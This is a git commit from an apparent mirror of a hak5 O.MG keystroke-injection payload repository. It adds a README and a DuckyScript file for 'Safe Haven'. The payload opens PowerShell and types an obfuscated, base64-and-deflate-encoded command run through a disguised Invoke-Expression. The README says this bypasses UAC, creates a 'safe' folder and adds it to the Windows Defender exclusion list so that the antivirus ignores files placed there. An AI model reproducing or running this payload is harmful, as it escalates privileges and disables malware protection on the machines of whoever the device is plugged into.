mirror of https://github.com/hak5/omg-payloads.git
commit
77bb76b9a1
|
@ -0,0 +1,97 @@
|
|||
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# Safe Haven
|
||||
|
||||
A script used to open an elevated powershell console and created a folder ignored by the AntiVirus
|
||||
|
||||
## Description
|
||||
|
||||
This is a UAC bypass payload that will open an elevated powershell console
|
||||
|
||||
Next a Directory called "safe" will be generated in your Documents Directory
|
||||
|
||||
The "safe" directory will be added to the Window's Defender Exclusion list
|
||||
|
||||
The AntiVirus will ignore all files downloaded to or ran from here
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Windows 10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* A keystroke injection based payload will run
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
I am Jakoby
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<div><h2>I am Jakoby</h2></div>
|
||||
<p><br/>
|
||||
|
||||
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||||
|
||||
<a href="https://github.com/I-Am-Jakoby/">
|
||||
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.instagram.com/i_am_jakoby/">
|
||||
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
|
||||
</a>
|
||||
|
||||
<a href="https://twitter.com/I_Am_Jakoby/">
|
||||
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.youtube.com/c/IamJakoby/">
|
||||
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
|
||||
</a>
|
||||
|
||||
Project Link: (https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-SafeHaven)
|
||||
</p>
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
|
@ -0,0 +1,25 @@
|
|||
REM Title: Safe-Haven
|
||||
|
||||
REM Author: I am Jakoby
|
||||
|
||||
REM Description: This is a UAC bypass payload that will open an elevated powershell console
|
||||
REM Next a Directory called "safe" will be generated in your Documents Directory
|
||||
REM The "safe" directory will be added to the Window's Defender Exclusion list
|
||||
REM The AntiVirus will ignore all files downloaded to or ran from here
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
ENTER
|
||||
|
||||
DELAY 1000
|
||||
|
||||
STRING & ( $PShoME[21]+$psHOME[30]+'x')(NEw-objECt IO.COMpresSiON.DeflATESTrEAm([sYStEm.io.MeMOrySTreAm] [SYSTEM.CONVERT]::fROMBase64StRing('hZFPT8JAEMW/yqbxWiDqwYRweFvKtipiLRAhvdTusBj6L93qop/eXRKNXvCyyWTe+72Z2YvFXEy8tjHU6T2V5YCOxHzD9sx/aB7dU8fMD49UMP7R5lozn+qC3YIbiBASvMF0hFjhgHCFF8UvMW2wTvjS1SvFE8xiLA0XCA9Ygs8wM3gCf4eYQya8hzj5RojmeAb/dNyt4iWCGAvj+hpb8BZRjBg2JwI2idUL5focIrF99AhHKGDzrG6b8MpxC8cR19gYxwPuE5sfKVdrRLZvLFfcuPzkZx+r+7MfJhNv3JFiuZTMi+6CVZY2u97kHWVBaW9COhs0lcpSd8Fs0VKdFU1V5bX02FCyC3tjNtz9h6i0r6nvX2uls+CtW1N3cnsO7Tn/rpE2oKXOfdI47fOu99OSqGW+ZlcnvKSSejo7pPc9ynnt72lOli8=' ),[SYsTEM.io.cOmpressION.coMPRESsiOnmode]::DEcOMPRESS )| FoREACh-object{NEw-objECt SySTeM.Io.StreaMreadER( $_ ,[System.teXT.EnCoDINg]::ASCiI) }|foReaCh-objEct {$_.ReAdToEND()} )
|
||||
ENTER
|
||||
|
||||
|
||||
|
||||
|
Loading…
Reference in New Issue